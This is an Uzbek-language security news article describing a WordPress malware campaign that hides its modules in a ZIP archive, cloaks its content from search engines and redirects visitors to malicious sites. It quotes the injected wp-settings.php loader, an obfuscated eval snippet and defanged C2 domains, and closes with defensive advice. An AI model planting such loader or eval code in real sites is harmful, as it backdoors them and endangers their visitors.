WordPress veb-saytlariga tahdid: Hujumchilar foydalanuvchilarni zararli sahifalarga yo‘naltirmoqda
🔐 Kiberxavfsizlik olimlari 2025-yilning iyul oyida aniqlangan murakkab zararli dastur kampaniyasini fosh qilishdi. Bu kampaniya WordPress asosidagi veb-saytlarga hujum qilib, foydalanuvchilarni maxfiy tarzda zararli sayt sahifalariga yo‘naltiradigan ilg‘or mexanizmga tayanadi. Eng xavflisi, bu zararli dastur o‘zini ZIP arxivi ichida yashirib, an’anaviy xavfsizlik vositalaridan chetlab o‘ta oladi.
Hujumchilar WordPress tizimidagi asosiy fayllardan biri — wp-settings.php faylini nishonga oladi. Unga zararli kod joylashtiriladi, bu kod esa PHP’ning zip:// stream wrapper funksiyasidan foydalangan holda, win.zip nomli fayl ichidagi yashirin zararli modullarni ishga tushiradi.
Bu usul bilan zararli kod tashqi ko‘rinishda mutlaqo bexavf faylga o‘xshaydi va ko‘pchilik xavfsizlik skanerlari bunday fayllarni tekshirib ham o‘tmaydi. Natijada, hujum uzoq vaqt davomida sezilmaydi va foydalanuvchilarga zarar yetkazishda davom etadi.
Zararli dastur foydalanuvchilarni noma’lum zararli sayt sahifalariga yo‘naltirishdan tashqari, qidiruv tizimlarining reyting tizimini manipulyatsiya qilish bilan ham shug‘ullanadi. Ya’ni:
- Veb-saytga maxfiy spam sahifalar joylashtiriladi;
- Sitemap (sayt xaritasi) buziladi;
- Qidiruv tizimlarga foydali kontent ko‘rsatilib, haqiqiy foydalanuvchilarga esa zararli yo‘naltirishlar amalga oshiriladi.
Shu bilan birga, zararli dastur insonga o‘xshash tashrif buyuruvchilar bilan botlar (Googlebot va boshqalar) ni farqlay oladi. Botlarga oddiy, zararli bo‘lmagan sahifa ko‘rsatiladi, odamlar esa zararli domenlarga yo‘naltiriladi.
Zararli kodning asosiy qismlari quyidagicha ko‘rinishda yashiringan:
$h = str_replace('www.', '', $_SERVER['HTTP_HOST']);
include('zip://win.zip#' . $h);
Bu kod foydalanuvchi tashrif buyurgan domenni aniqlab, ZIP fayl ichidagi o‘sha domen nomi bilan mos keluvchi faylni chaqiradi. Bu uslub orqali zararli komponentlar hech qanday ochiq PHP fayl ko‘rinishida emas, balki ZIP fayl ichida saqlanadi.
ZIP fayl ochilganda esa kuchli obfuskatsiyalangan, ya’ni qasddan chalkashtirilgan quyidagi kabi kodlar chiqadi:
$encode=$b3($string);
$string1=$b2($b4($encode));
echo eval("?>" . $string1);
Bu esa uni tahlil qilish va aniqlashni yanada mushkullashtiradi.
🕸 Markazlashmagan boshqaruv: C2 serverlar
Zararli dastur bir nechta boshqaruv (C2) serverlari bilan ishlaydi, ular orasida quyidagilar bor:
wditemqy[.]enturbioaj[.]xyzoqmetrix[.]icercanokt[.]xyz
Bu serverlar foydalanuvchining tashrif marshrutiga qarab har xil domenlar orqali boshqariladi, bu esa hujumchilarga kuzatuvdan qochish va moslashtirilgan zararli kontent tarqatish imkonini beradi.
Ushbu hujum — zamonaviy veb-xavfsizlik tahdidlarining qanchalik murakkab va ayyor bo‘lib borayotganini yana bir bor isbotlaydi. WordPress platformasidan foydalanayotgan har bir foydalanuvchi yoki administrator quyidagilarga qat’iy amal qilishi kerak:
✔️ WordPress va uning plaginlarini doimo yangilab borish;
✔️ wp-settings.php kabi muhim fayllarda kutilmagan o‘zgarishlarni aniqlash uchun monitoring o‘rnatish;
✔️ ZIP fayllar bilan ishlaganda ehtiyotkorlikni kuchaytirish;
✔️ Qidiruv tizimi reytingidagi g‘ayritabiiy o‘zgarishlarni doimiy kuzatib borish;
✔️ Raqamli imzoni qo‘llab-quvvatlaydigan xavfsiz skaner va fayl himoyasini o‘rnatish.
Yodingizda bo‘lsin — eng kuchli himoya doimo hushyorlik va yangiliklardan boxabar bo‘lishdir!
